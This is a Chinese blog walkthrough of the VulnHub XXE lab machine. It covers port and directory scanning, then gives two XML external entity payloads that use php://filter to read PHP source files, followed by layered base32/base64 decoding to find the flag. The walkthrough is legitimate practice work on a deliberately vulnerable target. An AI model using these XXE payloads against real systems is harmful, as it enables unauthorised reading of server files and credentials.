vulhub-XXE靶机的打靶日常

项目地址

https: //download.vulnhub.com/xxe/XXE.zip

首先,我们下载靶机,打开靶场

使用vm打开靶机

打开至此界面说明靶机已被打开

然后我们打开靶场,靶场位于其所在网段的随机位置

使用端口扫描找一找靶机在什么地方

然后,我们需要找漏洞入口了

拿出我们的看家绝活,目录扫描工具

看看这个txt什么样子

看不懂问问神奇的ai

所以我们访问一下xxe和admin.php

先来看看xxe输入个账号密码,有账号回显,来抓个包看看

很显然这个网站接受name和psw的数据后台很像xml做的,那我们试着用一用xss漏洞给它注入一下。

之所以找admin.php是因为上面禁止浏览器搜索这个网址

<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>123456</password></root>

经过解码后发现账号密码

把密码md5解码

登录

没反应,那么换个地方,访问xxs的admin.php登录

很好猜到这个地方,毕竟txt一共就提示那么多

登录

他说我们找到flag了,真的吗?flagmeout.php

点击去发现他在开玩笑,我真是日了狗了这个老六。

遇事不决抓个包抓不到,返回之前的登录界面抓一个读一下这个php里装的啥东西

<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">
]>
<root><name>&admin;</name><password>123456</password></root>

解码,让我康康

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

这是放在什么鬼地方了继续解码

日了狗了这里面的东西层层加码,先要解base32再解一次base64

/etc/.flag.php

说是etc里的隐藏.flag.php里,真阴险还是个隐藏文件

那么bp继续读取这个

/etc/.flag.php看看结果

执行语句自己拼接吧,我就不给你们了

又是一长串,日了狗了,先解码

能不能讲人话,看不懂啊,去问问神奇的ai

ai说他是php,那么我们试着跑一下

做完了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值